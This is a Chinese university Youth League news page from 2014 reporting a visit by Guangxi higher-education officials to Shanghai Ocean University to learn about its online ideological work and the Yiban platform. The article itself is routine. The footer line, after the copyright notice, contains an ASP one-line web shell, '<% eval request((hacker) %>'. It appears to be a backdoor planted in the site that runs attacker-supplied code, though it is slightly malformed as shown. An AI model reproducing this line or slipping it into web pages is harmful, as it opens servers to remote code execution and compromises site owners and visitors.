当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
广西高校系统来校考察交流网络思政工作
[2014年03月03日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

     2月27日,在上海教育系统网络文化发展研究中心副主任朱明伦、易班建设部部长冯俊峰的陪同下,广西高校工委莫锦荣副书记、教育厅思政处李美清处长以及广西大学、桂林医学院、钦州学院等六所高校党委副书记和学工部负责同志一行来我校考察交流网络思政工作。座谈交流会在图文信息中心102室举行,校党委副书记汪歙萍、宣传部、社科部、学生处负责人出席会议。

    校党委副书记汪歙萍代表学校致欢迎辞。她介绍了我校开展易班建设工作的历史背景和工作情况,指出目前学校正在全力推进基于易班的全方位育人工作模式的创新与实践,通过信息化建设和育人机制的完善,逐步建设“学生理想信念和思想教育平台”、“能力建设与人格培养成长平台”、“成长服务与事务管理平台”,进行实现“育人为本、立德树人”的目标。

     学生处副处长罗汝坤、社科部主任董玉来分别从学生工作的创新应用和思想理论课的改革实践的角度介绍了学校开展网络思想政治育人的做法。双方进行了互动交流。广西高校工委莫锦荣副书记对我校的热情接待表示感谢,认为上海海洋大学的做法具有前瞻性和先进性。他指出,去年广西教工委专门安排辅导员来海洋大学挂职学习网络思政的经验做法,结合这次现场交流和学习,收获很大;广西将总结和借鉴相关经验做法,结合广西高校实际逐步在全区推进易班建设工作。他表示将加强与海洋大学的联系,并欢迎海洋大学来广西传经送宝。

 

关闭窗口

上一篇:我校召开党的群众路线教育实践活动总结大会

下一篇:我校启动“身边的模范”系列报道工作
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>